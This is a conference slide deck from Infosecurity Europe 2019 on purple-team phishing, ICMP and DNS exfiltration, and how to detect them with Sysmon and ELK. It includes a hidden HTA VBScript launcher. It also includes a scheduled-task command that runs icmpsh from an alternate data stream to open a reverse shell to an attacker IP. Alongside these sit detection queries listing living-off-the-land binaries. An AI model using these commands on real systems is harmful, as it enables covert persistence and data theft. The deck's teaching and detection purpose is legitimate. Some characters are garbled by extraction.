Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted Glasses

Phishing & OOB Exfiltration
Through Purple Tinted Glasses
Phishing & OOB Exﬁltra2on Through
Purple Tinted Glasses

Will Hunt – Co-Founder @ in.security
• 10+ years in cyber
• Assists government
• Hacker, formerly digital forensics
• Trainer @ various cons / events
• @Stealthsploit
• https://stealthsploit.com

• 14+ years in technical roles
• Hacker/Pentester
• Trainer/Speaker @ various cons/events
• @rebootuser
• hMps://rebootuser.com
Owen Shearing – Co-Founder @ in.security

Phishing & OOB ExﬁltraFon
Phish >
Monitoring >
ICMP Exfiltration >
Monitoring >
DNS Exfiltration >
Monitoring >

DNS
Dev
Clients
Corp
10.133.48.0/23
10.133.255.254
10.133.50.0/23
10.133.150.0/23
The Network
AMacker

Delivery Examples
• Email, generic ‘campaign’ or targeted attack (spear phishing)
• SMS (Smishing) / Voice (Vishing)
• Web based (malicious/hacked website)
• Malvertising
Phishing – Delivery & Payloads

Payload Examples
• Data collec2on via hosted forms (creden2als, personal/sensi2ve
informa2on, payment details)
• Spooﬁng and/or content injec2on targe2ng legi2mate websites
• Embedded code in aMached Oﬃce documents (Macros, DDE)
• Malicious HTA (HTML Applica2on)
• Targe2ng vulnerabili2es / n-day exploits
Phishing – Delivery & Payloads

Phishing – HTA Files
<script language="VBScript">
window.moveTo -4000, -4000
cmd = "powershell.exe -c Test-Connection 10.133.251.1xx"
Set runme = CreateObject("Wscript.Shell")
result = runme.Run(cmd, 0, true)
window.close()
</script>
Set to hidden
The command we are executing
Wait for command to complete before
con2nuing

Unicorn
• TrustedSec https://github.com/trustedsec/unicorn
• Simple to use, well documented and regularly updated with new
techniques/evasion methods
• Various payloads rely on msf handler listening on aMacking system (all
required conﬁgs generated by the tool)

Creating a Campaign
Gophish
• Targets (Users & Groups tab)
• Email template
• Landing page
• Sending Proﬁle
hMps://docs.getgophish.com/user-guide

<DEMO>
[Phishing]

Phish >
Monitoring >
ICMP ExﬁltraFon >
Monitoring >
DNS ExﬁltraFon >
Monitoring >

Sysmon
• Part of Sysinternals suite
https://docs.microsoft.com/en-
us/sysinternals/downloads/sysmon
• Configuration file can be supplied (-i)
containing desired rules
• Great template config from @SwiftOnSecurity
https://github.com/SwiftOnSecurity/sysmon-
config

Beats Agents
Packetbeat
• Lightweight packet analyser to send data to Elasticsearch / Logstash
• Configuration (Windows) – generate a configuration file, install the packetbeat
service (PS script included with package)
• Configured on select targets in the LAB
https://www.elastic.co/products/beats/packetbeat

Beats Agents
Winlogbeat
• Ship Windows event logs to Elasticsearch / Logstash
• Configuration (Windows) – generate a configuration file, install the winlogbeat
service (PS script included with package)
• Configured on the Windows clients and servers in the LAB
https://www.elastic.co/products/beats/winlogbeat

Monitoring & AlerFng
Kibana - web-based frontend to allow real-
time, visual analysis of collected data in
Elasticsearch
Elasticsearch – based on Apache Lucene, a
NoSQL (JSON based/document store
model) database
Logstash – a tool to intake, process and
output log data from various sources
Elas2csearch Logstash Kibanna (ELK)

Phishing IOCs
• In this example we’re focusing on HTA delivery
• Hence, mshta.exe is interes2ng to us…
beat.hostname : "<$target>" AND event_data.ParentImage : "mshta.exe"
• But, in reality, we may want to be a bit more thorough and check for
‘interes2ng’ processes spawning, excluding those from explorer.exe
• Enter LOLBAS - hMps://lolbas-project.github.io/#

Phishing IOCs

Phishing IOCs
beat.hostname = ”<$target>" AND (_exists_: event_data.ParentImage AND NOT
event_data.ParentImage: explorer.exe) AND (event_data.Image: Atbroker.exe OR
Bash.exe OR Bitsadmin.exe OR Certutil.exe OR Cmdkey.exe OR Cmstp.exe OR
Control.exe OR Csc.exe OR Cscript.exe OR Dfsvc.exe OR Diskshadow.exe OR Dnscmd.exe
OR Esentutl.exe OR Eventvwr.exe OR Expand.exe OR Extexport.exe OR Extrac32.exe OR
Findstr.exe OR Forfiles.exe OR Ftp.exe OR Gpscript.exe OR Hh.exe OR Ie4uinit.exe
OR Ieexec.exe OR Infdefaultinstall.exe OR Installutil.exe OR Makecab.exe OR
Mavinject.exe OR Microsoft.Workflow.Compiler.exe OR Mmc.exe OR Msbuild.exe OR
Msconfig.exe OR Msdt.exe OR Mshta.exe OR Msiexec.exe OR Odbcconf.exe OR Pcalua.exe
OR Pcwrun.exe OR Presentationhost.exe OR Print.exe OR Reg.exe OR Regasm.exe OR
Regedit.exe OR Register-cimprovider.exe OR Regsvcs.exe OR Regsvr32.exe OR
Replace.exe OR Rpcping.exe OR Rundll32.exe OR Runonce.exe OR Runscripthelper.exe
OR Sc.exe OR Schtasks.exe OR Scriptrunner.exe OR SyncAppvPublishingServer.exe OR
Verclsid.exe OR Wab.exe OR Wmic.exe OR Wscript.exe OR Wsreset.exe OR Xwizard.exe)

<DEMO>
[Phishing Monitoring]

Alternate Data Streams
• An ADS allows one file system entry to contain mul2ple data sets (NTFS only)
• Original file is always the ‘main’ stream, addi2onal streams are colon delimited
File.txt File.txt:secretdata.txt:$DATA
File.txt:shell.exe:$DATA
• One op2on to trigger – wmic process call create File.txt:shell.exe
• A nice ar2cle by Oddvar Moe on execu2ng files from ADS
hMps://oddvar.moe/2018/01/14/pupng-data-in-alternate-data-streams-and-how-
to-execute-it/

Scheduled Tasks
• Scheduled tasks can be leveraged to an aMacker’s advantage
• At boot, logon, event, worksta2on lock/unlock etc.
• Non-admin users can create tasks (within permission boundaries)
• Combine with an ADS?

Scheduled Tasks
schtasks /Create /SC ONEVENT
/MO *[System[EventID=7001]]
/EC System /TN "Windows
Updates" /TR "wmic process
call create
'c:WindowsSystem32spoold
riverscolorREADME:icmpsh.e
xe -t <$attacking_IP>'"

Binary ExecuFon
• AppLocker (default rules) prohibits binary
execution for standard users in several
places
• Default rules allow various locations under
C:Windows and System32
• https://github.com/api0cradle/UltimateAp
pLockerByPassList/blob/master/Generic-
AppLockerbypasses.md

ExﬁltraFng Data Over ICMP
• ICMP doesn’t use ports and is often left enabled, forgotten and
unmonitored
• Overcomes network egress issues when usual channels are blocked
• icmpsh is a reverse ICMP shell - https://github.com/inquisb/icmpsh
• Server works in C, Perl, Python, client is Win32
• Need to disable ICMP replies from attacking host before starting server
sysctl -w net.ipv4.icmp_echo_ignore_all=1

ExﬁltraFng Data Over ICMP
Dev
Clients
Corp
Attacker
10.133.48.0/23
DNS

<DEMO>
[ICMP Exﬁltra2on]

ICMP / Scheduled Task IOCs
• Repe22ve /
consistent ICMP
echo requests
(type 8)
• Correlate
network traﬃc to
sysmon logging

• Event 4698 (Scheduled task created)
• Check CLI (schtasks) access
event_data.Description : "Task Scheduler Configuration Tool"
AND _exists_:event_data.CommandLine

_exists_:event_data.ParentCommandLine AND
(event_data.ParentCommandLine : *cmd* OR *powershell*) AND NOT
event_data.TerminalSessionId : <X>

• Sysmon event ID 15:
FileCreateStreamHash
hMps://www.syspanda.com/index.php/2017/03/03/sysmon-ﬁltering-using-logstash/

Phish >
Monitoring >
ICMP Exfiltration >
Monitoring >
DNS Exfiltration >
Monitoring >

ExﬁltraFng Data Over DNS
I’m looking for attacker1.domainname.xyz,
do you know of this host?
Recursive ServerVic2m

Exfiltrating Data Over DNS
1. Hi, can you give me the TLD of .xyz?
2. Sure, try 123.123.123.124
Root Server1
2

3. Hi, can you give me the server address of
domainname.xyz?
4. Sure, this host can be found at 66.77.88.99
TLD Server
3
4
Root Server1
2
Recursive ServerVictim

5. Hi, i’m looking for the host
aMacker1.domainname.xyz, can you give me
the IP please?
6. Sure, this host is at 1.10.100.1
Name Server
5
6
TLD Server
3
4
Root Server1
2
Recursive ServerVictim

ExﬁltraFng Data Over DNS
The host you’re looking for can be found at
1.10.100.1, have a nice day!

(Simple Proof of Concept)
• A handy resource - hMps://www.notsosecure.com/oob-exploita2on-cheatsheet/

DNS
Dev
Clients
Corp
10.133.48.0/23
10.133.255.254
10.133.50.50
Attacker

<DNS DEMO>
Coming up shortly…

DNS IOCs (A Visual RepresentaFon)
• 1st IOC is based on a total count of ETLD requests over a defined time
period

DNS IOCs (A Visual RepresentaFon)
• 2nd IOC counts the ETLD requests and splits these into a series of
ques2on (query) names
NOT (dns.question.etld_plus_one : <$current_domain> OR *<$rev-zone>.in-
addr.arpa)

<DEMO>
[DNS Exfil & Monitoring]

Phish
Monitoring
ICMP Exfiltration
Monitoring
DNS Exfiltration
Monitoring

Key Takeaways
• Knowledge of common opensource toolsets to aid with internal tes2ng of
phishing with PowerShell based payloads
• Windows binaries for ‘living off the land’ and relevant IOC filters for Kibana
• Using Kibana to generate graphical charts that can be used to easily iden2fy
real-2me data exfiltra2on over various channels
• Details of common Opensource tools that can be used in aMacks/defense
simula2ons to aid in improving skills and awareness
• Improving an overall awareness of data exfiltra2on methods using non-
conven2onal channels

Thank you!
Questions?
Email: contact@in.security
TwiYer: @insecurity_ltd
Web: hMps://in.security

Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted Glasses

Recommended

Recommended

More Related Content

What's hot

What's hot (10)

Similar to Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted Glasses

Similar to Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted Glasses (20)

Recently uploaded

Recently uploaded (20)

Infosecurity Europe 2019 - Phishing & OOB Exfiltration Through Purple Tinted Glasses